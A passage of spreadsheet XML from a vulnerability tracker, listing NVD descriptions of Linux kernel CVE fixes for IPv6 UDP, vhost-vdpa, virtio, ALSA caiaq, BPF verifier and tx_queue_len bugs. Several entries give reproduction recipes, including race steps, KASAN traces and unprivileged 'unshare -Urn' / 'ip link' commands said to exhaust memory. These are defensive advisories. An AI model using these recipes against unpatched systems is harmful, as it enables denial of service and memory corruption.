        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P320" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q320" s="5" t="inlineStr"/>
      <c r="R320" s="5" t="inlineStr"/>
      <c r="S320" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: ipv6: Fix UDP length overflow with PMTU discover and big MTU
This commit bounds cork-&gt;base.fragsize to IP6_MAX_MTU for UDP sockets to
avoid a possible overflow of UDP length that triggers a WARN in
udp_set_len_short when setsockopt IPV6_MTU_DISCOVER is set to
IPV6_PMTUDISC_DO or IPV6_PMTUDISC_PROBE, and a large packet is sent over
a netdev with an unusually large MTU.
Steps to reproduce (included in the new selftest):
1. Set device MTU bigger than IP6_MAX_MTU. cork-&gt;base.fragsize will be
   set to that MTU in ip6_setup_cork.
2. Set IPV6_MTU_DISCOVER to IPV6_PMTUDISC_PROBE or IPV6_PMTUDISC_DO. It
   lets maxnonfragsize be set to device MTU (cork-&gt;fragsize) in
   __ip6_append_data, rather than to IP6_MAX_MTU.
3. Send 65528 bytes of payload (+8 bytes of UDP header, +40 bytes of
   IPv6 header). Device MTU allows it (it's only one byte bigger than
   IP6_MAX_MTU, and the device MTU is bigger than that).
4. The UDP length in the built packet is 65536, which overflows the
   16-bit length field and triggers the WARN in udp_set_len_short.
To avoid breaking sending UDP jumbograms over raw IPv6 sockets, limit
the change to UDP sockets only.
The original overflow bug with IPv6 and IPV6_PMTUDISC_DO seems to
predate git history (verified reproduction on 2.6.21), was fixed later,
and then reappeared in commit 427faee167bc ("net: ipv6: introduce
ip6_dst_mtu_maybe_forward"), which is chosen as the Fixes tag here. The
overflow with IPV6_PMTUDISC_PROBE reproduces since its introduction in
commit 628a5c561890 ("[INET]: Add IP(V6)_PMTUDISC_RPOBE").</t>
        </is>
      </c>
      <c r="T320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97984</t>
        </is>
      </c>
    </row>
    <row r="321">
      <c r="A321" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B321" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97992</t>
        </is>
      </c>
      <c r="D321" s="5" t="inlineStr"/>
      <c r="E321" s="5" t="inlineStr"/>
      <c r="F321" s="5" t="inlineStr"/>
      <c r="G321" s="5" t="inlineStr"/>
      <c r="H321" s="5" t="inlineStr"/>
      <c r="I321" s="5" t="inlineStr"/>
      <c r="J321" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K321" s="5" t="inlineStr"/>
      <c r="L321" s="5" t="inlineStr"/>
      <c r="M321" s="5" t="inlineStr"/>
      <c r="N321" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O321" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P321" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q321" s="5" t="inlineStr"/>
      <c r="R321" s="5" t="inlineStr"/>
      <c r="S321" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vhost-vdpa: protect config_ctx from being freed under the config callback
vhost_vdpa_config_cb() loads v-&gt;config_ctx and signals it without taking
a reference and without holding any lock:
	struct eventfd_ctx *config_ctx = v-&gt;config_ctx;
	if (config_ctx)
		eventfd_signal(config_ctx);
VHOST_VDPA_SET_CONFIG_CALL replaces that field and drops what is normally
the last reference to the old context:
	swap(ctx, v-&gt;config_ctx);
	if (ctx)
		eventfd_ctx_put(ctx);
eventfd_ctx_put() drops the last kref and frees the context immediately,
with no RCU grace period, so a callback that has already loaded the
pointer goes on to dereference freed memory.  The two sides share no
lock: the ioctl runs under vhost_dev.mutex, while the parent invokes the
callback from its own interrupt or workqueue context.
This is not the reopen refcount underflow fixed by commit f6bbf0010ba0
("vhost-vdpa: fix use-after-free of v-&gt;config_ctx"), which was about
vhost_vdpa_config_put() leaving a stale pointer behind.  Here the pointer
is maintained correctly and it is the read side that is unprotected.
With VDUSE as the parent this is reachable from userspace with access to
/dev/vduse (root by default).  VDUSE_DEV_INJECT_CONFIG_IRQ queues
dev-&gt;inject, and vduse_dev_irq_inject() runs the callback under VDUSE's
own dev-&gt;irq_lock, which vhost does not hold.  vduse_dev_reset() does
flush_work(&amp;dev-&gt;inject), but VHOST_VDPA_SET_CONFIG_CALL never goes
through reset, so an inject already in flight is not waited for.  A
process that injects config interrupts on the VDUSE fd while another
thread swaps the call fd on the vhost-vdpa fd hits it in seconds:
  BUG: KASAN: slab-use-after-free in native_queued_spin_lock_slowpath
  Read of size 4 at addr ffff888107d21808 by task kworker/u17:1/2993
  Workqueue: vduse-irq vduse_dev_irq_inject
  Call Trace:
   native_queued_spin_lock_slowpath+0x97/0x5b0
   _raw_spin_lock_irqsave+0xd4/0xe0
   eventfd_signal_mask+0x69/0x120
   vhost_vdpa_config_cb+0x34/0x50
   vduse_dev_irq_inject+0x46/0x60
   process_one_work+0x468/0x950
  Allocated by task 2992:
   do_eventfd+0x50/0x200
   __x64_sys_eventfd2+0x2e/0x40
  Freed by task 2992:
   eventfd_ctx_put+0xb9/0xc0
   vhost_vdpa_unlocked_ioctl+0x116c/0x2190
Add a spinlock covering every access to config_ctx, so the callback
either signals a context that is still alive or observes NULL, and the
put happens only once no callback can reach the old value.
Clearing the parent's callback before the put would not be enough: of the
in-tree set_config_cb() implementations only VDUSE takes a lock, the rest
store the pointer unlocked, so that would not order against an in-flight
invocation.</t>
        </is>
      </c>
      <c r="T321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97992</t>
        </is>
      </c>
    </row>
    <row r="322">
      <c r="A322" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B322" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97996</t>
        </is>
      </c>
      <c r="D322" s="5" t="inlineStr"/>
      <c r="E322" s="5" t="inlineStr"/>
      <c r="F322" s="5" t="inlineStr"/>
      <c r="G322" s="5" t="inlineStr"/>
      <c r="H322" s="5" t="inlineStr"/>
      <c r="I322" s="5" t="inlineStr"/>
      <c r="J322" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K322" s="5" t="inlineStr"/>
      <c r="L322" s="5" t="inlineStr"/>
      <c r="M322" s="5" t="inlineStr"/>
      <c r="N322" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O322" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P322" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q322" s="5" t="inlineStr"/>
      <c r="R322" s="5" t="inlineStr"/>
      <c r="S322" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
virtio: fix use-after-free in unregister_virtio_device()
device_unregister() is device_del() plus put_device(). When the caller
holds no extra reference, that drops the last one and runs the release
callback, which for several transports frees the memory the embedded
struct virtio_device sits in. unregister_virtio_device() then calls
virtio_debug_device_exit(), which reads dev-&gt;debugfs_dir out of the freed
object.
Affected transports are the ones whose release callback frees and whose
remove path takes no reference: virtio_mmio, virtio_vdpa, virtio_uml,
mlxbf-tmfifo and virtio_ccw. virtio_pci is unaffected because
virtio_pci_remove() brackets the call with get_device() and put_device().
Remove the debugfs entries before the device can go away. They are only
accessed through the protected debugfs interface, so
debugfs_remove_recursive() waits for in-progress file operations before
returning. Tearing them down while the device is still alive is therefore
safe.
Reproduced on User-Mode Linux with CONFIG_KASAN and CONFIG_VIRTIO_DEBUG
by unbinding a virtio-uml device:
  BUG: KASAN: slab-use-after-free in virtio_debug_device_exit+0x36/0x4d
  Read of size 8 at addr 00000000616e0b10 by task init/1
   __asan_report_load8_noabort
   virtio_debug_device_exit+0x36/0x4d
   unregister_virtio_device+0x48/0x75
   virtio_uml_remove
   platform_remove
   device_release_driver_internal
   unbind_store
  Freed by task 1:
   kfree
   virtio_uml_release_dev
   device_release
   kobject_put
   put_device
   device_unregister
With this applied, the report is gone and unbind is clean.</t>
        </is>
      </c>
      <c r="T322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97996</t>
        </is>
      </c>
    </row>
    <row r="323">
      <c r="A323" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B323" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97997</t>
        </is>
      </c>
      <c r="D323" s="5" t="inlineStr"/>
      <c r="E323" s="5" t="inlineStr"/>
      <c r="F323" s="5" t="inlineStr"/>
      <c r="G323" s="5" t="inlineStr"/>
      <c r="H323" s="5" t="inlineStr"/>
      <c r="I323" s="5" t="inlineStr"/>
      <c r="J323" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K323" s="5" t="inlineStr"/>
      <c r="L323" s="5" t="inlineStr"/>
      <c r="M323" s="5" t="inlineStr"/>
      <c r="N323" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O323" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P323" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q323" s="5" t="inlineStr"/>
      <c r="R323" s="5" t="inlineStr"/>
      <c r="S323" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
virtio_ring: fix stale descriptor flags after a failed packed add
In a packed ring the AVAIL and USED bits sit in the descriptor itself,
so writing them makes that descriptor available. Those bit combinations
flip meaning on every round of the ring, tracked by a wrap counter, so
invalidating or validating a descriptor means inverting both bits.
Commit 1ce9e6055fa0 ("virtio_ring: introduce packed ring support") has
virtqueue_add_packed() make every descriptor of a chain available as it
maps the chain, and write the head last. The device consumes the ring in
order and stops at a head that is not available yet, so it never reaches
the rest.
When vring_map_one_sg() fails partway, unmap_release unmaps the segments
and restores avail_used_flags, but the descriptors it wrote to in the
ring stay marked with AVAIL and USED bits. The head is now the only
entry that keeps the device from consuming these stale entries.
For example, the ring would look like this now.
  Z - pre-previous command
  A - previous command
  B - aborted command
  C - current command
  [A1 DONE] [A2 DONE] &lt;C1 EMPTY&gt; [B2] [B3] [Z1 DONE]
When the driver now attempts to issue the C command, the next add starts
at the same head as B. If C spans less descriptors than B, there is no
end marker because AVAIL and USED bits were still in place. And that
means the device will start interpreting these stale entries (B2/B3) as
another command entry, which then blocks the queue.
This effect typically happens in swiotlb configurations under memory
pressure, because vring_map_one_sg() can then fail with larger I/O
requests which then leads to command abortions.
There are broadly 2 ways to avoid leaving those flags behind:
  1) Defer those flags too until the chain is complete.
  2) Rewrite those flags for the previous wrap counter.
Implement the second option in both packed add paths. The first option
traverses the chain a second time on every successful add. The second
option invalidates all added descriptors when any add fails.
With this patch applied, a packed virtqueue keeps completing requests
after a failed add.</t>
        </is>
      </c>
      <c r="T323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97997</t>
        </is>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B324" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98006</t>
        </is>
      </c>
      <c r="D324" s="5" t="inlineStr"/>
      <c r="E324" s="5" t="inlineStr"/>
      <c r="F324" s="5" t="inlineStr"/>
      <c r="G324" s="5" t="inlineStr"/>
      <c r="H324" s="5" t="inlineStr"/>
      <c r="I324" s="5" t="inlineStr"/>
      <c r="J324" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K324" s="5" t="inlineStr"/>
      <c r="L324" s="5" t="inlineStr"/>
      <c r="M324" s="5" t="inlineStr"/>
      <c r="N324" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O324" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P324" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q324" s="5" t="inlineStr"/>
      <c r="R324" s="5" t="inlineStr"/>
      <c r="S324" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: caiaq: Decoupling ep1_in_urb in caiaq dev
The epq_in_urb object belonging to the caiaq device is coupled within
the struct snd_usb_caiaqdev. After usb_submit_urb(epq_in_urb, GFP_KERNEL)
executes successfully, epq_in_urb is successfully added to the urbp_list
queue of the dummy HCD driver (userspace specifies dummy_hcd as the HCD
layer driver for the caiaq USB device).
When init_card() calls snd_usb_caiaq_send_command() which subsequently
fails due to a timeout, and proceeds to call snd_card_free() to release
the card, the embedded ep1_in_urb object is also freed. When the dummy
HCD driver detects that the URB has been unlinked, it returns the URB
(by usb_hcd_giveback_urb()), which triggers [1].
Decouple the ep1_in_urb object from the struct snd_usb_caiaqdev and switch
to using a pointer instead. Separately allocate and manage the memory for
ep1_in_urb to prevent the release of the snd_card memory object from
interfering with it.
midi_out_urb has the same issue as ep1_in_urb and is handled in the same
way.
[1]
BUG: KASAN: slab-use-after-free in usb_free_urb+0x24/0x120 drivers/usb/core/urb.c:96
Write of size 4 at addr ffff88803cee1050 by task ktimers/1/29
Call Trace:
 usb_free_urb+0x24/0x120 drivers/usb/core/urb.c:96
 dummy_timer+0xaac/0x4d50 drivers/usb/gadget/udc/dummy_hcd.c:2019
 __run_hrtimer kernel/time/hrtimer.c:2067 [inline]
 __hrtimer_run_queues+0x3eb/0xaf0 kernel/time/hrtimer.c:2124
 hrtimer_run_softirq+0x1e1/0x2e0 kernel/time/hrtimer.c:2141
Allocated by task 36:
 snd_card_new+0x7b/0x110 sound/core/init.c:184
 create_card sound/usb/caiaq/device.c:429 [inline]
 snd_probe+0x236/0x1af0 sound/usb/caiaq/device.c:544
Freed by task 36:
 snd_card_free_when_closed sound/core/init.c:630 [inline]
 snd_card_free+0x138/0x1d0 sound/core/init.c:662
 snd_probe+0x162b/0x1af0 sound/usb/caiaq/device.c:553</t>
        </is>
      </c>
      <c r="T324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98006</t>
        </is>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B325" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98007</t>
        </is>
      </c>
      <c r="D325" s="5" t="inlineStr"/>
      <c r="E325" s="5" t="inlineStr"/>
      <c r="F325" s="5" t="inlineStr"/>
      <c r="G325" s="5" t="inlineStr"/>
      <c r="H325" s="5" t="inlineStr"/>
      <c r="I325" s="5" t="inlineStr"/>
      <c r="J325" s="5" t="inlineStr">
        <is>
          <t>suse</t>
        </is>
      </c>
      <c r="K325" s="5" t="inlineStr"/>
      <c r="L325" s="5" t="inlineStr"/>
      <c r="M325" s="5" t="inlineStr"/>
      <c r="N325" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O325" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P325" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q325" s="5" t="inlineStr"/>
      <c r="R325" s="5" t="inlineStr"/>
      <c r="S325" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Reject non-scalar bpf_loop iteration counts
bpf_loop() declares its nr_loops argument as ARG_ANYTHING. Privileged
programs may pass pointer values to such arguments, so check_func_arg()
lets a pointer-valued R1 reach the helper-specific checks.
Since commit bb124da69c47 ("bpf: keep track of max number of bpf_loop
callback iterations"), the verifier marks R1 precise and reads its upper
bound to limit callback simulation. Precision backtracking only accepts
scalar registers, so passing a pointer instead triggers the "backtracking
misuse" verifier warning. Kernels with panic_on_warn enabled subsequently
panic.
Introduce ARG_SCALAR for helper arguments that only accept scalar values
and use it for bpf_loop() nr_loops. Generic helper argument validation then
rejects pointers before loop inlining and precision processing.</t>
        </is>
      </c>
      <c r="T325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98007</t>
        </is>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B326" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98019</t>
        </is>
      </c>
      <c r="D326" s="5" t="inlineStr"/>
      <c r="E326" s="5" t="inlineStr"/>
      <c r="F326" s="5" t="inlineStr"/>
      <c r="G326" s="5" t="inlineStr"/>
      <c r="H326" s="5" t="inlineStr"/>
      <c r="I326" s="5" t="inlineStr"/>
      <c r="J326" s="5" t="inlineStr">
        <is>
          <t>checkpoint</t>
        </is>
      </c>
      <c r="K326" s="5" t="inlineStr"/>
      <c r="L326" s="5" t="inlineStr"/>
      <c r="M326" s="5" t="inlineStr"/>
      <c r="N326" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O326" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P326" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q326" s="5" t="inlineStr"/>
      <c r="R326" s="5" t="inlineStr"/>
      <c r="S326" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: mark a NULL call argument precise
check_func_arg() allows bpf_register_is_null() for nullable arguments
w/o marking the underlying scalar register precise. Hence a checkpoint
created on such a path would prune against arbitrary scalar value.
check_helper_call() enforces second parameter of the
bpf_get_local_storage() to be zero, w/o marking the underlying scalar
register precise. Hence a checkpoint created on such a path would
prune against arbitrary scalar value.
Grouping these two into one patch, as they share the same fixes tag.</t>
        </is>
      </c>
      <c r="T326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98019</t>
        </is>
      </c>
    </row>
    <row r="327">
      <c r="A327" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B327" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98021</t>
        </is>
      </c>
      <c r="D327" s="5" t="inlineStr"/>
      <c r="E327" s="5" t="inlineStr"/>
      <c r="F327" s="5" t="inlineStr"/>
      <c r="G327" s="5" t="inlineStr"/>
      <c r="H327" s="5" t="inlineStr"/>
      <c r="I327" s="5" t="inlineStr"/>
      <c r="J327" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K327" s="5" t="inlineStr"/>
      <c r="L327" s="5" t="inlineStr"/>
      <c r="M327" s="5" t="inlineStr"/>
      <c r="N327" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O327" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P327" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q327" s="5" t="inlineStr"/>
      <c r="R327" s="5" t="inlineStr"/>
      <c r="S327" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: reject oversized tx_queue_len at netlink parse time
rtnl_create_link() assigns IFLA_TXQLEN directly to dev-&gt;tx_queue_len
without going through netif_change_tx_queue_len(), so a device created
with "ip link add ... txqueuelen 500000" bypasses the S16_MAX cap and
still triggers the oversized ring allocations in pfifo_fast, tun and
tap. The veth peer nest (rtnl_nla_parse_ifinfomsg()) and the
RTM_NEWLINK-on-existing-device path reach the same sinks.
Enforce the cap in ifla_policy instead: IFLA_TXQLEN becomes
NLA_POLICY_FULL_RANGE(NLA_U32, &amp;txqlen_range) with
txqlen_range = { .min = 0, .max = S16_MAX }. All netlink consumers
parse against this policy - rtnl_setlink(), rtnl_newlink() (create
and change), and the veth peer nest - so every netlink path is capped
at parse time and rejects the attribute with -ERANGE plus a proper
"integer out of range" extack message before any device state is
modified (the RTM_SETLINK half-application wart is gone with it).
Document the bound in the rt-link.yaml netlink spec.
Conditions to recreate the bug:
- CONFIG_NET_SCHED=y, CONFIG_VETH=y, CONFIG_USER_NS=y, CONFIG_NET_NS=y.
- Unprivileged user in a fresh user+net namespace (unshare -Urn):
  ip link add v0 txqueuelen 500000 type veth peer name v1
  -&gt; on the fixed kernel this is rejected with -ERANGE ("integer out
  of range" extack) instead of installing an oversized tx_queue_len
  that later inflates pfifo_fast/tun/tap ring allocations.
- ip link set v0 txqueuelen 500000 is likewise rejected at parse time.</t>
        </is>
      </c>
      <c r="T327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98021</t>
        </is>
      </c>
    </row>
    <row r="328">
      <c r="A328" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B328" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98022</t>
        </is>
      </c>
      <c r="D328" s="5" t="inlineStr"/>
      <c r="E328" s="5" t="inlineStr"/>
      <c r="F328" s="5" t="inlineStr"/>
      <c r="G328" s="5" t="inlineStr"/>
      <c r="H328" s="5" t="inlineStr"/>
      <c r="I328" s="5" t="inlineStr"/>
      <c r="J328" s="5" t="inlineStr">
        <is>
          <t>express</t>
        </is>
      </c>
      <c r="K328" s="5" t="inlineStr"/>
      <c r="L328" s="5" t="inlineStr"/>
      <c r="M328" s="5" t="inlineStr"/>
      <c r="N328" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O328" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P328" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q328" s="5" t="inlineStr"/>
      <c r="R328" s="5" t="inlineStr"/>
      <c r="S328" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: cap tx_queue_len at S16_MAX to prevent oversized ring allocations
Several subsystems allocate ring buffers sized by dev-&gt;tx_queue_len
with no upper bound. An unprivileged user (via unshare -Urn) can set a
huge tx_queue_len and exhaust global memory with ring allocations:
- pfifo_fast: pfifo_fast_init() and pfifo_fast_change_tx_queue_len()
  allocate 3 skb_array rings of tx_queue_len entries each.
- tun: tun_queue_resize() and the queue-attach path resize ptr_rings
  to tx_queue_len on the NETDEV_CHANGE_TX_QUEUE_LEN notifier.
- tap (macvtap/ipvtap): tap_queue_resize() and tap_init() resize/init
  ptr_rings to tx_queue_len on the same notifier.
netif_change_tx_queue_len() is the single entry point for IFLA_TXQLEN,
sysfs, and the SIOCSIFTXQLEN ioctl. Cap new_len at S16_MAX (32767)
there so the oversized value is rejected at set time. This takes
effect whether the device is up or down, before dev-&gt;tx_queue_len is
written, before any notifier fires, and before any ring is allocated.
The "&gt; S16_MAX" check also subsumes the previous unsigned-long
truncation test, and a negative ifr_qlen from the ioctl lands far
above the cap after conversion, so both old failure modes are covered
by the one comparison.
tx_queue_len is ambigious: both a per-ring sizing multiplier and a
default queue-length/limit knob for consumers that allocate
nothing at set time (pfifo/bfifo/gred/plug/sfb limits, htb
direct_qlen, qfq max_classes, teql). 32767 is chosen as the largest
value NLA_POLICY_FULL_RANGE can express for the u32 IFLA_TXQLEN
policy in patch 2/3 while staying a legitimate queue length on
high-BDP paths; the ring-memory trade-off of a shared knob is
disclosed below.
Conditions to recreate the bug:
- CONFIG_NET_SCHED=y, CONFIG_VETH=y, CONFIG_USER_NS=y, CONFIG_NET_NS=y.
- Unprivileged user in a fresh user+net namespace (unshare -Urn).
- pfifo_fast: create veth pairs, set tx_queue_len to 500000, attach
  mq+pfifo_fast. ~28 iterations OOMs a 2GB guest.
- tun: create 50 tun devices with IFF_MULTI_QUEUE, set tx_queue_len to
  500000, open 8 queues each. ~1.6GB of ptr_ring allocations OOMs a
  512MB guest.
- tap: same as tun with IFF_TAP. ~960MB OOMs a 512MB guest.
- On the fixed kernel the oversized tx_queue_len is rejected with
  -ERANGE at set time (all four paths: RTM_SETLINK, RTM_NEWLINK
  create, sysfs, ioctl - the latter two via this check, the former
  two via this check and the 2/3 parse policy respectively).</t>
        </is>
      </c>
      <c r="T328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98022</t>
        </is>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B329" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98034</t>
        </is>
      </c>
      <c r="D329" s="5" t="inlineStr"/>
      <c r="E329" s="5" t="inlineStr"/>
      <c r="F329" s="5" t="inlineStr"/>
      <c r="G329" s="5" t="inlineStr"/>
      <c r="H329" s="5" t="inlineStr"/>
      <c r="I329" s="5" t="inlineStr"/>
      <c r="J329" s="5" t="inlineStr">
        <is>
          <t>checkpoint, rust</t>
        </is>
      </c>
      <c r="K329" s="5" t="inlineStr"/>
      <c r="L329" s="5" t="inlineStr"/>
      <c r="M329" s="5" t="inlineStr"/>
      <c r="N329" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O329" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P329" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q329" s="5" t="inlineStr"/>
      <c r="R329" s="5" t="inlineStr"/>
      <c r="S329" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Mark NULL kptr stores precise
check_map_kptr_access() permits a scalar store into an untrusted kptr
field only when the register is known to contain zero. Unlike other
verifier checks whose outcome depends on a scalar value, it does not mark
that register precise.
A state checkpoint reached with an imprecise zero can therefore prune a
second path that reaches the store with an arbitrary nonzero scalar. The
program can write attacker-controlled bits into the kptr field and load
them back as a PTR_TO_BTF_ID.
Call mark_chain_precision() before accepting a known-zero register. This
forces state equivalence to compare its scalar range and makes the verifier
visit and reject a path carrying a nonzero value.</t>
        </is>
      </c>
      <c r="T329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98034</t>
        </is>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B330" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98037</t>
        </is>
      </c>
      <c r="D330" s="5" t="inlineStr"/>
      <c r="E330" s="5" t="inlineStr"/>
      <c r="F330" s="5" t="inlineStr"/>
      <c r="G330" s="5" t="inlineStr"/>
      <c r="H330" s="5" t="inlineStr"/>
      <c r="I330" s="5" t="inlineStr"/>
      <c r="J330" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K330" s="5" t="inlineStr"/>
      <c r="L330" s="5" t="inlineStr"/>
      <c r="M330" s="5" t="inlineStr"/>
      <c r="N330" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O330" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P330" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q330" s="5" t="inlineStr"/>
      <c r="R330" s="5" t="inlineStr"/>
      <c r="S330" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Reject untrusted allocated-object pointers
When the final RCU read-side critical section ends, a local kptr is demoted
to PTR_UNTRUSTED but retains MEM_ALLOC. The pointer may be NULL or may refer
to an object whose lifetime is no longer protected.
type_is_ptr_alloc_obj() nevertheless recognizes any PTR_TO_BTF_ID with
MEM_ALLOC as a live allocated object. In particular, a refcount-only local
kptr never carries NON_OWN_REF, so it still passes the
bpf_refcount_acquire() argument check after RCU protection ends. The kfunc
can then dereference NULL or stale memory.
Make type_is_ptr_alloc_obj() reject PTR_UNTRUSTED pointers. Since
type_is_non_owning_ref() is based on the same predicate, graph kfunc
arguments obey the same live-object requirement. Fault-protected reads of
the demoted pointer remain valid: writes are already rejected, and read
fixups use bpf_may_fault_on_deref() rather than this predicate.
[ kkd: Rewrote commit log ]</t>
        </is>
      </c>
      <c r="T330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98037</t>
        </is>
      </c>
